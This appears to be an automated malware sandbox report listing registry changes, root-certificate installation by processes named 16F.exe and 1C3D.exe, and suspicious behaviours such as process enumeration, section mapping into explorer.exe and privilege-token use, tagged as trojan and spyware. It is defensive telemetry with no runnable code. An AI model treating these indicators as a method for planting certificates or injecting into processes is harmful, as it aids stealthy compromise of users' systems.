Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\goodsurvey365.org\ = "76"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4b3596571a75d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\7289246C77593EBF\2 = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 208af6051875d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\7289246C77593EBF	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 646c46771775d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\goodsurvey365.org\Total = "1098"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myactualblog.com\Total = "137"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myactualblog.com\Total = "29"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myactualblog.com\ = "75"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\goodsurvey365.org\NumberOfS = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 541cec431a75d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myactualblog.com\Total = "179"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

16F.exe1C3D.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	16F.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	16F.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	1C3D.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	1C3D.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	1C3D.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspab2 (16).exe

pid	process
208	toolspab2 (16).exe
208	toolspab2 (16).exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3016

pid	process
3016

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

toolspab2 (16).exeA1CA.exeexplorer.exeexplorer.exeexplorer.exefa041e8b.exeMicrosoftEdgeCP.exetoolspab1.exe

pid	process
208	toolspab2 (16).exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
816	A1CA.exe
3016
3016
3016
3016
1704	explorer.exe
1704	explorer.exe
688	explorer.exe
688	explorer.exe
1004	explorer.exe
1004	explorer.exe
688	explorer.exe
688	explorer.exe
1004	explorer.exe
1004	explorer.exe
1704	explorer.exe
1704	explorer.exe
688	explorer.exe
688	explorer.exe
1004	explorer.exe
1004	explorer.exe
1704	explorer.exe
1704	explorer.exe
688	explorer.exe
688	explorer.exe
1004	explorer.exe
1004	explorer.exe
1704	explorer.exe
1704	explorer.exe
4264	fa041e8b.exe
688	explorer.exe
688	explorer.exe
1004	explorer.exe
1004	explorer.exe
1704	explorer.exe
1704	explorer.exe
4404	MicrosoftEdgeCP.exe
4404	MicrosoftEdgeCP.exe
7012	toolspab1.exe
1004	explorer.exe
1004	explorer.exe
1704	explorer.exe
1704	explorer.exe
688	explorer.exe
688	explorer.exe
688	explorer.exe
688	explorer.exe
1004	explorer.exe
1004	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

937D.exeB24.exe1075474_ah_hot_iconçè_)))_.exe2596.exe

description	pid	process
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
